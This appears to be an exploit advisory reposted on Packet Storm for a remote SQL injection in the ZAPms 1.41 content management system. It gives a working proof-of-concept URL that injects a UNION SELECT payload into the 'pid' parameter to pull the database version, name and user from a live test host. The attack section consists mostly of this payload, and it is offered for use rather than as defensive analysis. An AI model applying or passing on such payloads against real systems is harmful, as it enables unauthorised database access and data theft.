ZAPms version 1.41 suffers from a remote SQL injection vulnerability.
fdbb3c9ac475faabb959b176c865bb90290f7c1e94579706c71fa54561f748d7=============================================================================================================
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : ZAPms is free open source web content management system,
adapted to the needs of businesses on the Internet.
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
=============================================================================================================
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
=============================================================================================================
[o] PoC
http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 09 2013 - Papua, Indonesia
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed